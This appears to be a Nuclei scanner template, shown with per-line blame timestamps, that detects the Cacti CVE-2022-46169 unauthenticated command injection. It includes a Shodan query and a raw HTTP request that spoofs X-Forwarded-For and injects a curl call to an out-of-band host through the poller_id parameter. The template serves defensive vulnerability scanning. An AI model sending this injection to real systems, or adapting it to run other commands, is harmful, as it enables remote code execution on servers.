2023-03-31 11:52:51 +00:00
id : CVE-2022-46169
2022-12-23 12:35:53 +00:00
info :
2023-04-10 18:16:33 +00:00
name : Cacti <=1.2.22 - Remote Command Injection
2023-03-31 10:19:24 +00:00
author : Hardik-Solanki,j4vaovo
2022-12-23 19:23:41 +00:00
severity : critical
2022-12-23 12:35:53 +00:00
description : |
2023-04-10 18:16:33 +00:00
Cacti through 1.2.22 is susceptible to remote command injection. There is insufficient authorization within the remote agent when handling HTTP requests with a custom Forwarded-For HTTP header. An attacker can send a specially crafted HTTP request to the affected instance and execute arbitrary OS commands on the server, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
2023-09-06 11:59:08 +00:00
remediation : |
Upgrade Cacti to version 1.2.23 or later to mitigate this vulnerability.
2022-12-23 12:35:53 +00:00
reference :
- https://security-tracker.debian.org/tracker/CVE-2022-46169
- https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf
2022-12-23 12:39:56 +00:00
- https://www.cybersecurity-help.cz/vdb/SB2022121926
2023-04-10 18:16:33 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-46169
2023-07-11 19:49:27 +00:00
- https://github.com/Cacti/cacti/commit/7f0e16312dd5ce20f93744ef8b9c3b0f1ece2216
2022-12-23 12:35:53 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
cve-id : CVE-2022-46169
2023-10-23 12:22:20 +00:00
cwe-id : CWE-78,CWE-74
2023-10-14 11:27:55 +00:00
epss-score : 0.967
2023-10-25 06:44:12 +00:00
epss-percentile : 0.99524
2023-09-06 11:59:08 +00:00
cpe : cpe:2.3:a:cacti:cacti:*:*:*:*:*:*:*:*
2022-12-23 12:35:53 +00:00
metadata :
2023-06-04 08:13:42 +00:00
verified : true
2023-09-06 11:59:08 +00:00
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : cacti
product : cacti
2023-09-06 11:59:08 +00:00
shodan-query : title:"Login to Cacti"
2023-03-31 10:19:24 +00:00
tags : cve,cve2022,auth-bypass,cacti,kev,rce,unauth
2023-03-31 07:46:12 +00:00
variables :
useragent : '{{rand_base(6)}}'
2022-12-23 12:35:53 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-12-23 12:35:53 +00:00
- raw :
2022-12-23 18:12:40 +00:00
- |
2023-03-31 10:19:24 +00:00
GET /remote_agent.php?action=polldata&local_data_ids[0]=1&host_id=1&poller_id=;curl%20{{interactsh-url}}%20-H%20'User-Agent%3a%20{{useragent}}'; HTTP/1.1
2022-12-23 18:12:40 +00:00
Host : {{Hostname}}
X-Forwarded-For : 127.0 .0 .1
2022-12-23 12:45:39 +00:00
2022-12-23 12:54:35 +00:00
unsafe : true
2023-07-11 19:49:27 +00:00
2022-12-23 12:35:53 +00:00
matchers-condition : and
matchers :
- type : word
part : body
words :
2022-12-23 19:09:46 +00:00
- '"value":'
- '"local_data_id":'
condition : and
- type : word
part : interactsh_protocol
words :
- "http"
2022-12-23 12:35:53 +00:00
2023-03-31 06:30:50 +00:00
- type : word
part : interactsh_request
words :
2023-03-31 07:46:12 +00:00
- "User-Agent: {{useragent}}"
2023-03-31 06:30:50 +00:00
2022-12-23 12:35:53 +00:00
- type : status
status :
- 200
2023-10-23 12:51:13 +00:00
# digest: 490a0046304402206cd443d3f375a11d68a7bd1ba6288e6d105dc39e17c49611e002e7509ec96655022024179b0a27955eccb9eec90e543ee17229310351a0cc327d433d910d52e1a0e6:922c64590222798bb761d5b6d8e72950